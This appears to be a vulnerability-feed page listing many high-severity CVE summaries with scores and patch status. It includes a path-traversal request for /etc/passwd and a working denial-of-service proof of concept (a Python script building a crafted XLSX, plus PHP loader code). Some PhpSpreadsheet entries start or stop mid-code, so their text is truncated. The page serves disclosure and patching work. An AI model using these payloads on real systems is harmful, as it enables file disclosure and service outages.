Skip to main content
CVE-2026-42031 HIGH POC PATCH GHSA This Week

A vulnerability in `datastore_search_sql` allowed attackers to inject SQL in order to gain access to private resources and PostgreSQL system information. The issue has been patched in CKAN 2.10.10 and CKAN 2.11.5 Disable the DataStore SQL search (`ckan.datastore.sqlsearch.enabled = false`). Note that the SQL search is disabled by default. As stated in the [documentation](https://docs.ckan.org/en/2.11/maintaining/configuration.html#ckan-datastore-sqlsearch-enabled), this action function has protections that offer some safety but are not designed to prevent all types of abuse. Depending on the sensitivity of private data in a project's DataStore and the likelihood of abuse of a consuming site, a developer may choose to disable this action function or restrict its use with a [`IAuthFunctions`](https://docs.ckan.org/en/2.11/extensions/plugin-interfaces.html#ckan.plugins.interfaces.IAuthFunctions) plugin. * Reported by Arvin Shivram of Brutecat Security

PostgreSQL SQLi
NVD GitHub VulDB
CVSS 4.0
8.3
EPSS
3.1%
CVE-2018-25300 HIGH POC This Week

XATABoost CMS 1.0.0 contains a union-based SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the id parameter. Rated high severity (CVSS 8.8), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

SQLi PHP
NVD Exploit-DB
CVSS 4.0
8.8
EPSS
0.1%
CVE-2018-25308 HIGH POC This Week

BuddyPress Xprofile Custom Fields Type 2.6.3 contains a remote code execution vulnerability that allows authenticated users to delete arbitrary files by manipulating unescaped POST parameters. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

Path Traversal RCE Buddypress Xprofile Custom Fields Type
NVD Exploit-DB
CVSS 4.0
8.7
EPSS
0.2%
CVE-2026-34965 HIGH POC This Week

Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection rules parameters. Attackers can inject malicious PHP code through rule parameters which is written directly to server-side PHP files and executed via include() to achieve arbitrary command execution on the underlying server.

PHP Code Injection RCE
NVD GitHub
CVSS 4.0
8.7
EPSS
0.4%
CVE-2018-25307 HIGH POC This Week

SysGauge Pro 4.6.12 contains a local buffer overflow vulnerability in the Register function that allows local attackers to overwrite the structured exception handler by supplying a crafted unlock. Rated high severity (CVSS 8.6), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Buffer Overflow RCE Sysgauge Pro
NVD Exploit-DB VulDB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2018-25315 HIGH POC This Week

Alloksoft Video joiner 4.6.1217 contains a buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious string in the License Name field. Rated high severity (CVSS 8.6), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Buffer Overflow RCE Video Joiner
NVD Exploit-DB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2018-25314 HIGH POC This Week

Allok soft WMV to AVI MPEG DVD WMV Converter 4.6.1217 contains a buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying an oversized string in the License. Rated high severity (CVSS 8.6), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Buffer Overflow RCE Wmv To Avi Mpeg Dvd Wmv Converter
NVD Exploit-DB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2018-25303 HIGH POC This Week

Allok Video to DVD Burner 2.6.1217 contains a stack-based buffer overflow vulnerability in the License Name field that allows local attackers to execute arbitrary code by triggering a structured. Rated high severity (CVSS 8.6), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

RCE Buffer Overflow Stack Overflow Allok Video To Dvd Burner
NVD Exploit-DB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2018-25301 HIGH POC This Week

Easy MPEG to DVD Burner 1.7.11 contains a structured exception handling (SEH) local buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious. Rated high severity (CVSS 8.6), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Buffer Overflow RCE Easy Mpeg To Dvd Burner
NVD Exploit-DB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2018-25299 HIGH POC This Week

Prime95 29.4b8 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by exploiting structured exception handling (SEH) mechanisms. Rated high severity (CVSS 8.6), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Buffer Overflow RCE Prime95
NVD Exploit-DB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2018-25304 HIGH POC This Week

Free Download Manager 2.0 Built 417 contains a local buffer overflow vulnerability in the URL import functionality that allows attackers to trigger a structured exception handler (SEH) chain. Rated high severity (CVSS 8.6), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Buffer Overflow RCE Free Download Manager
NVD Exploit-DB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2018-25302 HIGH POC This Week

Allok AVI to DVD SVCD VCD Converter 4.0.1217 contains a structured exception handling (SEH) based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a. Rated high severity (CVSS 8.5), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Buffer Overflow RCE Allok Avi To Dvd Svcd Vcd Converter
NVD Exploit-DB
CVSS 4.0
8.5
EPSS
0.0%
CVE-2026-37555 HIGH POC PATCH This Week

An issue was discovered in libsndfile 1.2.2 IMA ADPCM codec. The AIFF code path (line 241) was fixed with (sf_count_t) cast, but the WAV code path (line 235) and close path (line 167) were not. When samplesperblock (int) * blocks (int) exceeds INT_MAX, the 32-bit multiplication overflows before being assigned to sf.frames (sf_count_t/int64). With samplesperblock=50000 and blocks=50000, the product 2500000000 overflows to -1794967296. This causes incorrect frame count leading to heap buffer overflow or denial of service. Both values come from the WAV file header and are attacker-controlled. This issue was discovered after an incomplete fix for CVE-2022-33065.

Buffer Overflow Integer Overflow Denial Of Service Libsndfile
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-7420 HIGH POC This Week

A security flaw has been discovered in UTT HiPER 1250GW up to 3.2.7-210907-180535. Impacted is the function strcpy of the file route/goform/ConfigAdvideo. The manipulation of the argument Profile results in buffer overflow. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks.

Buffer Overflow Hiper 1250Gw
NVD VulDB GitHub
CVSS 4.0
7.4
EPSS
0.0%
CVE-2026-7419 HIGH POC This Week

A vulnerability was identified in UTT HiPER 1250GW up to 3.2.7-210907-180535. This issue affects the function strcpy of the file route/goform/formTaskEdit_ap. The manipulation of the argument Profile leads to buffer overflow. Remote exploitation of the attack is possible. The exploit is publicly available and might be used.

Buffer Overflow Hiper 1250Gw
NVD VulDB GitHub
CVSS 4.0
7.4
EPSS
0.0%
CVE-2026-7418 HIGH POC This Week

A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. This vulnerability affects the function strcpy of the file route/goform/NTP. Executing a manipulation of the argument Profile can lead to buffer overflow. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized.

Buffer Overflow Hiper 1250Gw
NVD VulDB GitHub
CVSS 4.0
7.4
EPSS
0.0%
CVE-2018-25312 HIGH POC This Week

LifeSize ClearSea 3.1.4 contains directory traversal vulnerabilities that allow authenticated attackers to download and upload arbitrary files by manipulating path parameters in the smartgui. Rated high severity (CVSS 7.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

Path Traversal RCE Clearsea
NVD Exploit-DB
CVSS 4.0
7.1
EPSS
0.7%
CVE-2018-25311 HIGH POC This Week

VideoFlow Digital Video Protection DVP 2.10 contains an authenticated directory traversal vulnerability that allows authenticated attackers to disclose arbitrary files by injecting path traversal. Rated high severity (CVSS 7.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

Path Traversal Videoflow Digital Video Protection
NVD Exploit-DB
CVSS 4.0
7.1
EPSS
0.3%
CVE-2026-42513 HIGH This Week

This vulnerability exists in e-Sushrut due to improper authentication logic that relies on client-side response parameters to determine authentication status. A remote attacker could exploit this vulnerability by intercepting and modifying the server response. Successful exploitation of this vulnerability could allow the attacker to bypass authentication and gain unauthorized access to user accounts on the targeted system.

Authentication Bypass E Sushrut Hospital Management Information System Hmis
NVD
CVSS 4.0
8.8
EPSS
0.3%
CVE-2026-42514 HIGH This Week

This vulnerability exists in e-Sushrut due to exposure of OTPs in plaintext within API responses. A remote attacker could exploit this vulnerability by intercepting API responses containing valid OTPs. Successful exploitation of this vulnerability could allow an attacker to impersonate the target user and gain unauthorized access to user accounts on the targeted system.

Authentication Bypass E Sushrut Hospital Management Information System Hmis
NVD VulDB
CVSS 4.0
8.8
EPSS
0.2%
CVE-2026-6849 HIGH PATCH This Week

Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS Command Injection. This issue affects Pardus OS My Computer: from <=0.7.5 before 0.8.0.

Command Injection Pardus Os My Computer
NVD
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-42235 HIGH PATCH GHSA This Week

Cross-site scripting (XSS) in n8n's MCP OAuth client registration allows remote attackers to execute arbitrary JavaScript in authenticated user sessions. Unauthenticated attackers can inject malicious scripts via the client_name parameter during OAuth client registration, which executes when a second user revokes the OAuth consent, triggering a vulnerable toast notification. Successful exploitation enables session token theft, workflow manipulation, and privilege escalation. CVSS 8.2 (High) reflects the changed scope and complex attack chain requiring victim interaction across multiple user sessions. No public exploit or CISA KEV listing identified at time of analysis, but exploit development is straightforward given the clear attack vector.

Privilege Escalation
NVD GitHub VulDB
CVSS 4.0
8.8
EPSS
0.1%
CVE-2026-5140 HIGH PATCH This Week

Improper neutralization of CRLF sequences ('CRLF injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus allows Authentication Bypass. This issue affects Pardus: from <=0.6.4 before 0.8.0.

Authentication Bypass Pardus
NVD VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-5161 HIGH This Week

Improper link resolution before file access ('link following') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus About allows Symlink Attack. This issue affects Pardus About: before v1.2.1.

Information Disclosure Pardus About
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-5141 HIGH PATCH This Week

Improper Privilege Management, Improper Access Control, Incorrect privilege assignment vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus Software Center allows Hijacking a privileged process. This issue affects Pardus Software Center: before 1.0.3.

Privilege Escalation Pardus Software Center
NVD
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-38991 HIGH PATCH GHSA This Week

Remote code execution in Cockpit CMS 2.13.5 and earlier allows authenticated users with low privileges to execute arbitrary PHP code on the server. Attackers exploit a filter bypass in the Bucket component's _isFileTypeAllowed function by crafting filenames that evade extension validation, then renaming files to .php for execution. Public proof-of-concept exists (SSVC: poc). EPSS data unavailable, but CVSS 8.8 with network vector and low attack complexity indicates high exploitability once authenticated.

PHP RCE File Upload
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-42236 HIGH PATCH GHSA This Week

Unauthenticated remote attackers can crash n8n workflow automation instances by flooding the MCP OAuth client registration endpoint with large payloads, exhausting server memory and causing denial of service. The vulnerability affects all n8n instances regardless of whether MCP (Model Context Protocol) access is enabled, as the endpoint lacks authentication and resource controls. Vendor-released patches (1.123.32, 2.17.4, 2.18.1) impose registration limits and disable the endpoint when MCP is turned off. No public exploit identified at time of analysis, though the attack is trivial to execute given the unauthenticated nature of the endpoint.

Denial Of Service
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.1%
CVE-2026-42518 HIGH This Week

This vulnerability exists in e-Sushrut due to disclosure of sensitive information and hardcoded AES encryption keys in client-side JavaScript. An unauthenticated remote attacker could exploit this vulnerability by accessing the client-side code to extract sensitive information and cryptographic keys. Successful exploitation of this vulnerability could lead to exposure of sensitive data and compromise of cryptographic protections on the targeted system.

Information Disclosure
NVD VulDB
CVSS 4.0
8.7
EPSS
0.1%
CVE-2026-41587 HIGH PATCH GHSA This Week

Authenticated users with theme upload permission in CI4MS (CodeIgniter 4 CMS/ERP) versions 0.26.0.0 through 0.31.6.0 can achieve remote code execution by uploading a malicious ZIP archive containing PHP files. The theme installation routine writes arbitrary files-including executable PHP-directly into the web-accessible public/templates/ directory without extension filtering or content validation, enabling direct HTTP access to webshells. A proof-of-concept exploit is publicly available via the GitHub security advisory (GHSA-fw49-9xq4-gmx6), and the vendor has released a patched version 0.31.7.0 implementing strict file extension allowlists for the public directory.

PHP RCE File Upload
NVD GitHub
CVSS 4.0
8.6
EPSS
0.4%
CVE-2026-42352 HIGH PATCH GHSA This Week

OGC API - Process execution requests can use the `subscriber` object to requests to internal HTTP services. The issue has been patched in master branch and made available as part of the 0.23.3 release. The patch disables any HTTP requests made to internal resources by default (unless explicitly defined in configuration by a new `allow_internal_requests` directive. The commit/fix can be found in [3a63f5b0cc6275e3ae0edb47726b13a43cdd90ef](https://github.com/geopython/pygeoapi/commit/3a63f5b0cc6275e3ae0edb47726b13a43cdd90ef). Users can update existing applications by disabling process based resources in their pygeoapi config, until 0.23.3 can be installed and deployed.

SSRF
NVD GitHub
CVSS 3.1
8.6
EPSS
0.0%
CVE-2026-7111 HIGH PATCH This Week

Text::CSV_XS versions before 1.62 for Perl have a use-after-free when registered callbacks extend the Perl argument stack, which may enable type confusion or memory corruption. The Parse, print, getline, and getline_all methods invoke registered callbacks (for example after_parse, before_print, or on_error) and cache the Perl argument stack pointer across the call. If a callback extends the argument stack enough to trigger a reallocation, the return value is written through the stale pointer into the freed buffer, and the caller reads the original $self argument as the return value instead. Calling code that expects parsed data from getline_all receives the Text::CSV_XS object in its place, leading to logic errors or crashes. Text::CSV_XS objects used without any registered callbacks are not affected.

Buffer Overflow Text
NVD GitHub VulDB
CVSS 3.1
8.4
EPSS
0.0%
CVE-2026-42353 HIGH PATCH GHSA This Week

Versions of `i18next-http-middleware` prior to 3.9.3 pass the user-controlled `lng` and `ns` values from `getResourcesHandler` directly into `i18next.services.backendConnector.load(languages, namespaces, …)` without any sanitisation. Depending on which backend is configured, the unvalidated path segments enable one of two attacks: - **Filesystem path traversal** when the middleware is paired with `i18next-fs-backend` (or any backend that interpolates `lng` / `ns` into a filesystem path). - **Server-Side Request Forgery (SSRF)** when the middleware is paired with `i18next-http-backend` (or any backend that interpolates into an HTTP URL). Example request: ``` GET /locales/resources.json?lng=../../etc/passwd&ns=root ``` with `i18next-fs-backend` reads the attacker-chosen file from disk; with `i18next-http-backend` reshapes the outgoing URL to target an internal service. - **Arbitrary file read** via `fs`-style backends - any file the Node process can read becomes reachable (source, configuration, `.ssh` keys, `.env`, Docker secrets, etc.). - **SSRF** via `http`-style backends - requests to internal IPs / hostnames not normally reachable from the internet; combined with cloud metadata endpoints this can escalate to credential theft. - **Unbounded growth of `i18next.options.ns`** - a now-incidental amplification: the pre-patch `getResourcesHandler` pushed every unique `ns` value into the shared `i18next.options.ns` singleton array without validation or bounds, enabling memory exhaustion from repeated unique payloads. The severity is bounded by the backend in place, but the middleware itself exposed the unsanitised path; this is the "weakest link" layer. `< 3.9.3`. Fixed in **3.9.3**. The patch introduces `utils.isSafeIdentifier` and applies it in `getResourcesHandler` before `lng` and `ns` reach the backend connector: ```js languages = languages.filter(utils.isSafeIdentifier) namespaces = namespaces.filter(utils.isSafeIdentifier) ``` `isSafeIdentifier` uses a denylist approach - it still accepts any legitimate i18next language-code shape ([i18next FAQ](https://www.i18next.com/how-to/faq#how-should-the-language-codes-be-formatted)) - rejecting: - `..` sequences (relative path traversal) - path separators (`/`, `\`) - control characters (C0/C1) - prototype keys (`__proto__` / `constructor` / `prototype`) - empty strings and values longer than 128 characters Unsafe values are dropped; only safe values reach the backend. The fix is a defence-in-depth layer on top of any sanitisation the backend itself may apply. No workaround short of upgrading. Front-proxying the middleware with a WAF rule that rejects requests containing `..`, `/`, `\`, or URL-structure characters in `lng` / `ns` is a partial mitigation. Upgrading the configured backend (`i18next-fs-backend` ≥ 2.6.4, `i18next-http-backend` ≥ 3.0.5) also closes the same attack at the next layer. - [GHSA-5fgg-jcpf-8jjw](https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-5fgg-jcpf-8jjw) - prototype pollution via `setPath` and `missingKeyHandler`. Independently fixable, filed separately per CNA rules. - [GHSA-c3h8-g69v-pjrg](https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-c3h8-g69v-pjrg) - HTTP response splitting + XSS-filter bypass (CVE-2026-41683). Discovered via an internal security audit of the i18next ecosystem. - [CWE-22: Path Traversal](https://cwe.mitre.org/data/definitions/22.html) - [CWE-918: Server-Side Request Forgery (SSRF)](https://cwe.mitre.org/data/definitions/918.html) (specific sub-case when paired with an HTTP backend) - [i18next FAQ: language code formatting](https://www.i18next.com/how-to/faq#how-should-the-language-codes-be-formatted)

Docker SSRF Path Traversal XSS
NVD GitHub
CVSS 3.1
8.2
EPSS
0.1%
CVE-2026-41670 HIGH PATCH GHSA This Week

SAML response redirection in Admidio 5.0.8 and earlier allows attackers to steal signed authentication assertions containing user credentials and profile data by exploiting missing validation of the AssertionConsumerServiceURL in SAML AuthnRequests. The Identity Provider (IdP) accepts attacker-controlled destination URLs from SAML requests without verifying them against registered Service Provider endpoints, enabling assertion theft and account impersonation across federated applications. No public exploit code identified at time of analysis, though proof-of-concept demonstration is included in the GitHub security advisory GHSA-p9w9-87c8-m235. EPSS data not available for this CVE.

PHP Information Disclosure
NVD GitHub
CVSS 3.1
8.2
EPSS
0.0%
CVE-2026-41669 HIGH PATCH GHSA This Week

SAML signature validation in Admidio's Identity Provider implementation can be completely bypassed due to discarded return values in authentication flows. The validateSignature() method returns error strings on failure but both call sites (SSO and Single Logout handlers) discard the return value, allowing unsigned or invalidly-signed SAML requests to proceed. Attackers can forge AuthnRequests to exfiltrate logged-in users' personal data (username, email, real name, role memberships) to attacker-controlled endpoints, or forge LogoutRequests to terminate victim sessions and cascade logout across federated Service Providers. The smc_require_auth_signed configuration setting provides no protection. Public exploit code exists (PoC in GitHub advisory). CVSS 8.2 reflects network-accessible attack with no authentication required, though practical exploitation of the SSO path requires victim to have an active session. No active exploitation confirmed at time of analysis.

PHP CSRF Jwt Attack Denial Of Service
NVD GitHub
CVSS 3.1
8.2
EPSS
0.0%
CVE-2026-42524 HIGH PATCH GHSA This Week

Jenkins HTML Publisher Plugin 427 and earlier does not escape job name and URL in the legacy wrapper file, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

Jenkins XSS
NVD VulDB
CVSS 3.1
8.0
EPSS
0.0%
CVE-2026-5712 HIGH PATCH This Week

This vulnerability impacts all versions of IdentityIQ and allows an authenticated identity that is the requestor or assignee of a work item to edit the definition of a role without having an assigned capability that would allow role editing.

Authentication Bypass Identityiq
NVD VulDB
CVSS 3.1
8.0
EPSS
0.0%
CVE-2026-0204 HIGH This Week

A vulnerability in the access control mechanism of SonicOS may allow certain management interface functions to be accessible under specific conditions.

Information Disclosure Sonicos
NVD VulDB
CVSS 3.1
8.0
EPSS
0.0%
CVE-2026-41220 HIGH PATCH This Week

Local privilege escalation due to improper input validation. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.93212, Acronis Cyber Protect Cloud Agent (Windows) before build 42183.

Buffer Overflow Memory Corruption Microsoft Privilege Escalation
NVD VulDB
CVSS 3.0
7.8
EPSS
0.0%
CVE-2026-41952 HIGH PATCH This Week

Local privilege escalation due to improper input validation. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.93212, Acronis Cyber Protect Cloud Agent (Windows) before build 42183.

Microsoft Privilege Escalation
NVD VulDB
CVSS 3.0
7.8
EPSS
0.0%
CVE-2026-30769 HIGH This Week

Local privilege escalation in EnTech Taiwan TVicPort v4.0 (driver v5.2.1.0) allows authenticated low-privileged users to gain SYSTEM privileges via crafted IOCTL 0x80002008 requests to the TVicPort64.sys kernel driver. The vulnerability stems from improper input validation (CWE-20) in IOCTL handling. Publicly available exploit code exists (GitHub gist), enabling straightforward elevation of privileges on systems with the driver installed. SSVC assessment indicates total technical impact with no active exploitation reported, though the low attack complexity and available POC present significant risk to environments using this I/O port access driver.

Privilege Escalation Tvicport
NVD GitHub VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-7466 HIGH PATCH This Week

AgentFlow contains an arbitrary code execution vulnerability that allows attackers to execute local Python pipeline files by supplying a user-controlled pipeline_path parameter to the POST /api/runs and POST /api/runs/validate endpoints. Attackers can induce requests to the local AgentFlow API to load and execute existing Python pipeline files on disk, resulting in code execution in the context of the user running AgentFlow.

Python Code Injection RCE
NVD GitHub VulDB
CVSS 4.0
7.7
EPSS
0.0%
CVE-2026-42249 HIGH This Week

Ollama for Windows contains a Remote Code Execution vulnerability in its update mechanism due to improper handling of attacker‑controlled HTTP response headers. When downloading updates, the application constructs local file paths using values derived from HTTP headers without validation. These values are passed directly to filepath.Join, allowing path traversal sequences (../) to be resolved and enabling files to be written outside the intended update staging directory. An attacker who can influence update responses can exploit this flaw to write arbitrary executables to attacker‑chosen locations accessible to the current user, including the Windows Startup directory. This allows execution of arbitrary executables. Critically, when chained with CVE‑2026‑42248 (Missing Signature Verification for Updates), an attacker can deliver malicious payloads that are written to sensitive locations and executed automatically. Because Ollama for Windows performs silent automatic updates and executes staged binaries without user interaction, this results in automatic and persistent code execution without user awareness. Maintainers of this project were notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Versions from 0.12.10 to 0.17.5 were tested and confirmed as vulnerable, other versions were not tested but might also be vulnerable.

Microsoft Path Traversal RCE
NVD VulDB
CVSS 4.0
7.7
EPSS
0.0%
CVE-2026-42248 HIGH This Week

Ollama for Windows does not perform integrity or authenticity verification of downloaded update executables. Unlike other platforms, the Windows implementation of the update verification routine unconditionally returns success so no digital signature or trust validation is performed before staging or executing update payloads, enabling attacker‑supplied executables to be accepted and later executed by the application. Critically, Ollama for Windows performs silent automatic updates, so the malicious payload may be installed automatically without user awareness. Maintainers of this project were notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Versions from 0.12.10 to 0.17.5 were tested and confirmed as vulnerable, other versions were not tested but might also be vulnerable.

Information Disclosure Microsoft
NVD VulDB
CVSS 4.0
7.7
EPSS
0.0%
CVE-2026-42224 HIGH PATCH GHSA This Week

Reflected cross-site scripting (XSS) in Icinga Web's ipl-web library (composer package ipl/web) allows remote attackers to execute arbitrary JavaScript in victim browsers via malformed search requests. Affects all versions ≤0.13.0. Fixed in ipl/web 0.13.1 (bundled in icinga-php-library 0.19.2). Requires high-privilege authenticated attacker and victim user interaction via social engineering. No active exploitation confirmed by CISA KEV. CVSS 7.7 reflects scope change (cross-user impact) despite complex attack prerequisites.

XSS
NVD GitHub VulDB
CVSS 3.1
7.6
EPSS
0.0%
CVE-2026-42646 HIGH This Week

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Steve Burge TaxoPress simple-tags allows Blind SQL Injection.This issue affects TaxoPress: from n/a through <= 3.44.0.

SQLi Taxopress
NVD
CVSS 3.1
7.6
EPSS
0.0%
CVE-2026-42520 HIGH PATCH GHSA This Week

Jenkins Credentials Binding Plugin 719.v80e905ef14eb_ and earlier does not sanitize file names for file and zip file credentials, allowing attackers able to provide credentials to a job to write files to arbitrary locations on the node filesystem, which can lead to remote code execution if Jenkins is configured to allow a low-privileged user to configure file or zip file credentials used for a job running on the built-in node.

Jenkins RCE Path Traversal
NVD VulDB
CVSS 3.1
7.5
EPSS
0.3%
CVE-2026-42351 HIGH PATCH GHSA This Week

A raw string path concatenation vulnerability in pygeoapi's STAC FileSystemProvider plugin can allow for requests to STAC collection based collections to expose directories without authentication. The issue manifests when pygeoapi is deployed without a proxy or web front end that would normalize URLs with `..` values, along with a resource of type `stac-collection` defined in configuration. The issue has been patched in master branch and made available as part of the 0.23.3 release. The commit/fix can be found in [bf25b8695edbdd5476eeffc102b633d1d3e45f52](https://github.com/geopython/pygeoapi/commit/bf25b8695edbdd5476eeffc102b633d1d3e45f52). Users can safeguard existing applications by disabling STAC collection based resources in their pygeoapi config, until 0.23.3 can be installed and deployed.

Path Traversal
NVD GitHub
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-40902 HIGH PATCH GHSA This Week

{ if (!isset($this->rowDimensions[$row])) { $this->rowDimensions[$row] = new RowDimension($row); $this->cachedHighestRow = max($this->cachedHighestRow, $row); } return $this->rowDimensions[$row]; } ``` The inflated `cachedHighestRow` is then returned by `getHighestRow()` (line 1099) and used as the default end bound in `RowIterator::resetEnd()` (RowIterator.php:86): ```php // RowIterator.php:86 $this->endRow = $endRow ?: $this->subject->getHighestRow(); ``` Notably, column attributes already have equivalent validation at line 161 (`AddressRange::MAX_COLUMN_INT`), and cell coordinates are validated in `Coordinate::coordinateFromString()` (line 40) against `MAX_ROW`. The row dimension attribute path bypasses both of these checks. **Step 1: Create the malicious XLSX file (~1.6KB)** ```python import zipfile import io content_types = '<?xml version="1.0" encoding="UTF-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/><Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/></Types>' rels = '<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="xl/workbook.xml"/></Relationships>' workbook = '<?xml version="1.0" encoding="UTF-8"?><workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/></sheets></workbook>' wb_rels = '<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/></Relationships>' sheet = '<?xml version="1.0" encoding="UTF-8"?><worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetData><row r="1"><c r="A1"><v>1</v></c></row><row r="999999999" ht="15"/></sheetData></worksheet>' with zipfile.ZipFile('dos_row.xlsx', 'w', zipfile.ZIP_DEFLATED) as zf: zf.writestr('[Content_Types].xml', content_types) zf.writestr('_rels/.rels', rels) zf.writestr('xl/workbook.xml', workbook) zf.writestr('xl/_rels/workbook.xml.rels', wb_rels) zf.writestr('xl/worksheets/sheet1.xml', sheet) print("Created dos_row.xlsx") ``` **Step 2: Load with PhpSpreadsheet (CPU exhaustion)** ```php <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; $reader = IOFactory::createReader('Xlsx'); $spreadsheet = $reader->load('dos_row.xlsx'); $sheet = $spreadsheet->getActiveSheet(); echo "Highest row: " . $sheet->getHighestRow() . "\n"; // Output: Highest row: 999999999 // This will consume CPU for ~144 seconds (999M iterations) foreach ($sheet->getRowIterator() as $row) { // CPU exhaustion } ``` **Expected output:** `getHighestRow()` returns 999999999. Any row iteration hangs indefinitely. - **CPU Denial of Service:** A 1.6KB crafted XLSX file causes ~999 million loop iterations in any application that iterates rows using `getRowIterator()` or uses `getHighestRow()` as a loop bound. Estimated CPU burn is ~144 seconds per file. - **Memory Exhaustion:** Applications that accumulate data during iteration (e.g., importing rows into a database, building arrays) will also exhaust memory. - **Amplification:** The ratio of input size to resource consumption is extreme - 1,580 bytes triggers nearly 1 billion iterations. - **Common Attack Surface:** PhpSpreadsheet is widely used in web applications that accept user-uploaded spreadsheets for import/processing, making this easily exploitable remotely. Add row bounds validation in `readRowAttributes()` at line 216, matching the column validation pattern already present at line 161: ```php // src/PhpSpreadsheet/Reader/Xlsx/ColumnAndRowAttributes.php:216 // Before: $rowIndex = (int) $row['r']; // After: $rowIndex = (int) $row['r']; if ($rowIndex < 1 || $rowIndex > AddressRange::MAX_ROW) { continue; } ``` The `AddressRange` import is already present at line 5 of this file. This fix is consistent with the existing cell coordinate validation in `Coordinate::coordinateFromString()` and the column validation at line 161.

PHP Python Denial Of Service
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-40863 HIGH PATCH GHSA This Week

{ $rowID = (int) $row_ss['Index']; // No validation against MAX_ROW } if (isset($row_ss['Hidden'])) { $rowVisible = ((string) $row_ss['Hidden']) !== '1'; $spreadsheet->getActiveSheet()->getRowDimension($rowID)->setVisible($rowVisible); } ``` The `$rowID` value read from `ss:Index` is cast to int with no upper bound check. It is then passed to `getRowDimension()`: ```php // Worksheet.php:1342-1351 public function getRowDimension(int $row): RowDimension { if (!isset($this->rowDimensions[$row])) { $this->rowDimensions[$row] = new RowDimension($row); $this->cachedHighestRow = max($this->cachedHighestRow, $row); } return $this->rowDimensions[$row]; } ``` This inflates `cachedHighestRow` to the attacker-controlled value. Additionally, at line 412, `$cellRange = $columnID . $rowID` is constructed and passed to `getCell()`, which calls `createNewCell()` (Worksheet.php:1294) and also sets `cachedHighestRow`. The `RowIterator` constructor uses `getHighestRow()` as its default end row: ```php // RowIterator.php:84-88 public function resetEnd(?int $endRow = null): static { $this->endRow = $endRow ?: $this->subject->getHighestRow(); return $this; } ``` With `cachedHighestRow` at ~1 billion, iterating over rows causes CPU exhaustion. The `DefaultReadFilter` provides no protection - it returns `true` for all cells. Even without the `Hidden` attribute, any cell data within the row 